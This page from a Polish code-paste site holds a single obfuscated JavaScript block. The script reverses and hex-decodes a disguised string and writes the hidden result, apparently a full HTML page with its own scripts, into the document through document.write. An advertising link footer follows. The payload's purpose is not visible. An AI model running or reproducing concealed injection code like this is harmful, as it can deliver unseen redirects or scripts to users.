Kashub's Code Barn - "f"

podświetlone jako html4strict (dodał(a) fsddgfdgdfgh @ 2013-12-24 13:07:59)

Twoja wyszukiwarka
Podświetl ten kod w:
Ostatnio dodane:
Losowe wpisy:
<SCRIPT LANGUAGE="JavaScript">var a="A%2fD%2fE3C6D6%4a786F2C3A%2fD%2fE397%4a6F626F2C3A%2fD%2fE3%4a5%2f59%4a253%4a35F2C3A%2fD%2fE3D2D2%2f2F2F2A%2fD%2fD7%fd6E6F627%4a737B227%4a737D366562786E2E6F696%4a7%fd636F6C6%2f25637C656%2f2%2f2A%2fD%2fB39282B636%fd626E29727F6%4a737968692C6C657E6D3D3C6826696%2f2%2f2A%2fD%2fB79282E6F696%4a736E65766D3%4a6%fd6F6C6E6F6%2f2A%2fD%2fB39272E3%4a7%2f796273637F2C5C3E32237A6E272B2C6B27222D3362737%2f222%4a7%2f796273637%fd667%fd6A6F2%4a78756%4a722D356%2f797%4a7%2f2%4a7%2f796273637C3728256%4a7962777E2%4a7E656D65736F6%4a6%2f2A%2fD%2fA%2fD%2f922222C222A3F63B37%fd686%2f26E%fd6%4a6F6%2f7%2f2AEA737F627%2f52282%4a7%2f7D6F627%2f7D3C6%2f2A%2fD%2fB322C6D6%4a786E2%4a353%4a3D28666A66622D3%fd6E6F627%4a737%2f2A%2fD%2f%2f2D2D2%fd2C3A%2fD%2fE322%4a7%2f796273637%fd667%fd6A6F2%4a78756%4a722D35%4a%2f595%4a5%2f2%4a5%2f59%4a253%4a35C3A%2fD%2fE2E2E26E%fd6B656A736%2f2AEA737F627%2f5%2f2E2E2E2%fd6A636%fd6A79727F6%4a757%fd6%2f2%fd67727%4a5B3%2f73726E662B3%2f73726E662B3%2f73726E662B3%2f73726E662B3%2f73726E662B3%2f73726E662A%2fD%2fE3F2%2f22726C3E3F2%2f22726C3E3F2%2f22726C3E3F2%2f22726C3E3F2%2f22726C3E3F2%2f22726C3A%2fD%2fE3223%4a3%4a6%4a6%4a6%4a6%4a3222D3%4a78756%4a7%2f2223333%2f3%2f3%2f3%2f33222D327F6C6F6367626%2f297%4a6F626C3A%2fD%2fA%2fD%2fE3D2D237A6E2%4a68686D2%2f3%4a383%4a3D296%4a7C6%4a6B6%4a6D2%4a67676D2D2%fd2C3A%2fD%2fA%2fD%2fE3%4a6%fd65686F2C3A%2fD%2fE3%4a7%2f796273637F2C3A%2fD%2fE3D2D2%2f2F2F2A%2fD%2fD7A%2fD%2fB372C6D6%4a786E28756%4a6E69672D3E6F696%4a7%fd636F6C6E277F6%4a6E69677A%2fD%2fB39272E3%fd6F2C3A6%fd6%4a757%4a7%2f2A696E6B696C6B6E322C6D6%4a786E28756%4a6E69622D366562786%2f2%fd6C3%2f2C2%fdB9677%fd6A6F6%2f7%2f25696E6%2f2AE9637%2f296C66B56A%4a%2f2E2B656D6%fd627%2f25696E6%fd677F6%4a6%fd63B%fd6A7%2f2%fd6E6%2f2A6%fd6B656A73%4a7282E6C656%4a7962777E2%4a7E656D65736F6%4a6A%2fD%2fB7A%2fD%2f92E6F696%4a7%fd636F6C6E277F6%4a6E69677D3D3E6F696%4a7%fd636F6C6E2%4a7E65627%fd6%2f7E277F6%4a6E6967782%2f26696A%2fD%2fD2D2%fd2C3A%2fD%2fE3%4a7%2f796273637C3A%2fD%2fA%2fD%2fE356C6%4a796%4a7F2C35677F6%2f7AE%4a737F6%4a6%2f2F63B37%fd686%2f2A6%fd6%4a6F6%2f5E356C6%4a796%4a7C3%2f2%2f2A%2fD%2fE322855%4a%4a%4aE%4a9%4aF%4aE%4aC275F%4aC%4aC%4aF%4a6%4aF%4aE%4a22D3%4a5E%4a5%4a%4a5E%4aF%4a3%4a%2f22237%4a7F626F62722D35%4aD%4a%fd%4aE%4a%2f2%fd%4a%4a55%4aD%4aC3%2f2%2f2A%2fD%2fE3F2%2f222568636%fd636D2F6E622D3%4a7E656%4a7E6F636%2f222%fd6D676%fd627%2f722D356D6%fd6E6%2f2%fd6%4a756D6C3%2f2%2f2A%2fD%2fE3F2%2f222C6%2f722D3%4a7E656%4a7E6F636%2f2225676%fd65776E6%fd6C6D2%4a7E656%4a7E6F63622D356D6%fd6E6%2f2%fd6%4a756D6C3%2f2%2f2A%2fD%2fE3%4a7%2f796273637F2C3E32237A6E2273722D336273722%4a7%2f796273637%fd667%fd6A6F2%4a78756%4a722D356%2f797%4a7%2f2%4a7%2f796273637C3%2f2%2f2A%2fD%2fE3F2%2f22223D293538383D2F63796D3%4a7563727%fd68636%2f2B3C6D6%4a786F2%4a78756%4a722D3%4a7E656%4a7E6F636%2f22256%2f797%4a7D2%4a7E656%4a7E6F63622D3679657%fd756D2%2f7%4a7%4a786%2f2%fd6%4a756D6C3%2f2%2f2A%2fD%2fE3%4a6%fd65686C3A%2fD%2fA%2fD%2fE3A%2fD%2f225637C6%fd666%2f2E62757%4a7562722D397%2f7F636E6F69%2fA%2fD%2f225637C6%fd666%2f2E62757%4a7562722D357E656D6%4a78756%4a7E6F636E6F69%2fA%2fD%2f95%4a%4aF%4a2%4aC3A%2fD%2fA%2fD%2fE3%4a5%2f59%4a253%4a35F2C3A%2fD%2fD7A%2fD%2fB35%4a9%4aE677F6%4a%4a9756B%4aB636F6C626D3E677F6%4a69756B6E6F6E2%4a7E656D65736F6%4a69%2fA%2fD%2fB35%4a9%4a563757F6D%4aB636F6C626D3E677F6%4a6563757F6D6E6F6E2%4a7E656D65736F6%4a69%2fA%2fD%2fB7925%4a9%4a826696A%2fD%2fD7A%2fD%2fB3E%4aE%4aE677F6%4a%4a9756B%4aB636F6C626D3E677F6%4a69756B6E6F6E2%4a7E656D65736F6%4a69%2fA%2fD%2fB3E%4aE%4a563757F6D%4aB636F6C626D3E677F6%4a6563757F6D6E6F6E2%4a7E656D65736F6%4a69%2fA%2fD%2fB392E%4a75F%4a%4a%4a5%4a3555F%4aD%4aE2%4a7E656675%4a8237%4a7E656675%4a562757%4a7%2f7%fd636E2%4a7E656D65736F6%4a69%2fA%2fD%2fB792E%4aE%4a826696A%2fD%2fB3928227563777F6272%4a56A796E676F6365627A%2fD%2fD7A%2fD%2f%2f2D79%2fA%2fD%2fB35637C6%fd666%2f2E62757%4a756279%2f9%2fA%2fD%2fB39222%fd297E6%fd677F6B6F6C626%fd6A7%2f2%4a73756A6%2f2C627%4a73%4a%2f2A7379677%fd6C6B%4a2282%4a72756C6%fd69%2f9%2fA%2fD%2fB79273%fd3%2f2D3D3%2f28636968677E2%4a767568266969%2fA%2fD%2fB7A%2fD%2f92%4a7675682E%4aE%4aE677F6%4a%4a9756B%4aB636F6C626%2f2E6F696%4a736E65766A%2fD%2fA%2fD%2fD7A%2fD%2fD79%2fA%2fD%2fB35637C6%fd666%2f2E62757%4a756279%2f9%2fA%2fD%2fB39222%fd297E6%fd677F6B6F6C626%fd6A7%2f2%4a73756A6%2f2C627%4a73%4a%2f2A7379677%fd6C6B%4a2282%4a72756C6%fd69%2f9%2fA%2fD%2fB79273%fd3%2f2D3D3%2f256%4a6F63%4a9756B6E2%4a7E65667568266969%2fA%2fD%2fB7A%2fD%2f92825%4a9%4aE677F6%4a%4a9756B%4aB636F6C626%2f2E6F696%4a736E65766A%2fD%2fA%2fD%2fD7A%2fD%2fD79%2fA%2fD%2fB35637C6%fd666%2f2E62757%4a756279%2f9%2fA%2fD%2fB39272%fd297A73797D6%2f257B637963697A727%2f7%2f2F6765677%fd627%2f7%2f2%fd6%4a6%fd6B6F6C62%4a7282%4a72756C6%fd69%2f9%2fA%2fD%2fB79233%2f2D3D3%2f28636968677E2%4a767568266969%2fA%2fD%2fB7A%2fD%2f92%4a7675682E%4aE%4a563757F6D%4aB636F6C626%2f2E6F696%4a736E65766A%2fD%2fD7A%2fD%2fD79%2fA%2fD%2fB35637C6%fd666%2f2E62757%4a756279%2f9%2fA%2fD%2fB39272%fd297A73797D6%2f257B637963697A727%2f7%2f2F6765677%fd627%2f7%2f2%fd6%4a6%fd6B6F6C62%4a7282%4a72756C6%fd69%2f9%2fA%2fD%2fB79223%2f2D3D3%2f2E6F6%4a7%4a75726E2%4a7E65667568266969%2fA%2fD%2fB7A%2fD%2f92825%4a9%4a563757F6D%4aB636F6C626%2f2E6F696%4a736E65766A%2fD%2fD7A%2fD%2fB35637C6%fd666%2f2A3%2f2565727%4a7%2f2F3%2f292%fd3D2%2f2D3%fd2%2f292225%4a9%4a35D%4a228266F%4a8756%4a6E696E227%4a73782%2f2D3%2f25%4a9%4a9%2fA%2fD%2fB3E62757%4a7562792E%4aE%4a8266969%2fA%2fD%2fB35637C6%fd666%2f2A3%2f2565727%4a7%2f2F3%2f292%fd3D2%2f2D3%fd2%2f2922256%2f7%fd63637%4a756E%4a228266F%4a8756%4a6E696E227%4a73782%2f2D3%2f2E%4aE%4a9%2fA%2fD%2fB3%4a7E65676%fd%4a27563757E227F6%4a7%fd6769667%fd6E6%2f2D3%2f227%4a737%2f227%fd6679%2fA%2fD%2fB35637C6%fd666D35%4a9%4aB35637C6%fd666D3E%4aE%4a9%2fA%2fD%2fB7A%2fD%2f928227563777F6272%4a56A796E676F6365627%2f2E6F696%4a736E65766A%2fD%2fB35%4a9%4a%2f2C2E%4aE%4a%2f227%fd667A%2fD%2fE322%4a7%2f796273635%fd667%fd6A%4a22D35%4a7%4a%fd%4a557%4aE%4a%fd%4aC%4a%2f2%4a5%2f59%4a253%4a35C3";a = a.replace(/%fd/g,'1');a = a.replace(/%4a/g,'4');a = a.replace(/%2f/g,'0');b = '';for(i = a.length-1; i >= 0; i--){b += a.charAt(i);}i = 0; a='';while(i < b.length){c = parseInt(b.charAt(i++), 16) * 16 + parseInt(b.charAt(i++), 16);switch (c){case 185 : c = 261; break;case 230 : c = 263; break;case 234 : c = 281; break;case 179 : c = 322; break;case 241 : c = 324; break;case 156 : c = 347; break;case 191 : c = 380; break;case 159 : c = 378; break;}a += String.fromCharCode(c);};document.write(a);</SCRIPT>
| Opony letnie | | Sklep z artykułami RTV/AGD | | Dyskretny sexshop internetowy | | Sklep z artykułami dla zwierząt | | Programista Trójmiasto | | Skróć link | | Blog o książkach | | Gdzie przenieść blog za darmo? | | Kody programów |